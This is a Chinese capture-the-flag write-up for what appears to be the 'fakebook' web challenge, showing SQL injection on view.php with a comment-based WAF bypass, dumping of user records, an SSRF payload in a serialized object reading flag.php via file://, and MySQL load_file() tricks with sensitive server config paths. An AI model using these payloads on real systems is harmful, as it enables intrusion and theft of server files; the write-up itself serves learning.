因为是看了wp才做出来的，所以就直接记录过程和知识点了。

知识点：SSRF

SSRF,也就是Server Side RequestForgery—服务器端请求伪造。从字面上来看，与CSRF不同的是，它是服务器端发出的请求伪造而非从用户一端提交。别误会，作为受信任用户，服务器当然不可能做出损害用户信息的事。它是一种由攻击者构造形成，由服务端发起请求的一个安全漏洞。因为它是由服务端发起的，所以它能够请求到与它相连但与外网隔离的内部系统。

一般由curl的滥用引起。

题解：

一，信息搜集

经过分析可得：
1，注册界面输入的blog经过了isValidBlog（）函数的过滤，不然直接在注册界面输入file:///var/www/html/flag.php就能拿到flag。

2，get()函数存在ssrf漏洞。

二，登录一个账号测试

可以看到admin可以打开，打开后发现url里面有参数no，尝试注入：

order by 5时报错，可以判断字段数为4。

view.php?no=1 order by 4--+ 
		

			
			

				1
			

		

输入union select 1,2,3,4提示no hack

view.php?no=1 union select 1,2,3,4--+ 
		

			
			

				1
			

		

于是尝试绕过waf，改为union/**/select后成功绕过，发现注入点为2。

view.php?no=1 union/**/select 1,2,3,4--+ 
		

			
			

				1
			

		

数据库为：fakebook。

/view.php?no=0 union/**/select 1,database(),3,4--+
		

			
			

				1
			

		

表为：users。

/view.php?no=0 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='fakebook'--+
		

			
			

				1
			

		

列名为：no,username,passwd,data

/view.php?no=0%20union/**/select%201,group_concat(column_name),3,4 from information_schema.columns where table_schema='fakebook' and table_name='users'--+
		

			
			

				1
			

		

查出数据：
1-admin-c7ad44cbad762a5da0a452f9e854fdc1e0e7a52a38015f23f3eab1d80b931dd472634dfac71cd34ebc35d16ab7fb8a90c81f975113d6c7538dc69dd8de9077ec-O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:19;s:4:"blog";s:67:"http://2f653644-f372-48c1-a0f9-7938cd6adf27.node3.buuoj.cn/join.php";}

/view.php?no=0%20union/**/select%201,group_concat(no,'-',username,'-',passwd,'-',data),3,4 from fakebook.users --+
		

			
			

				1
			

		

三，利用ssrf漏洞

可以看到data中存的是反序列化数据，然后尝试利用ssrf漏洞读取flag.php。
构造payload为：

/view.php?no=0 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:19;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'
		

			
			

				1
			

		

查看源码，访问链接得到flag。

四，非预期解

因为没有禁用load_file()函数，所以可以直接利用该函数拿到flag。哈哈，看到这个非预期解还是有点懵的，绕了半天结果简单一步就出来了

payload：

/view.php?no=0 union/**/select 1,load_file('/var/www/html/flag.php'),3,4
		

			
			

				1
			

		

源码中找到flag：

非预期解深入了解

一，受到参数 secure_file_priv 的影响

查了查资料，因为涉及到在服务器上写入文件，所以上述函数能否成功执行受到参数 secure_file_priv 的影响。官方文档中的描述如下;

二，利用条件

而且想要利用是有条件限制的：

1、必须有权限读取并且文件必须完全可读。

2、欲读取文件必须在服务器上

3、必须指定文件完整的路径

4、欲读取文件必须小于max_allowed_packet

如果该文件不存在，或因为上面的任一原因而不能被读出，函数返回空。比较难满足的就是权限。
在windows下，如果NTFS设置得当，是不能读取相关的文件的，当遇到administrators才能访问的文件，
users就不能实现用load_file读取文件了。

三，利用技巧

1，绕过引号，因为现在magic_quotes_gpc=off的主机少之又少，怎么才能构造处没有引号的语句呢？

load_file('c:/boot.ini')==>load_file(char(99,58,47,98,111,111,116,46,105,110,105))

2，load_file()还有一些常用的读取敏感信息方法，例如：

/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件

c:\Program Files\Apache Group\Apache\conf\httpd.conf 或C:\apache\conf\httpd.conf  查看WINDOWS系统apache文件

c:/Resin-3.0.14/conf/resin.conf   查看jsp开发的网站 resin文件配置信息. 

如果不知道确切路径，可以尝试读取其他敏感数据。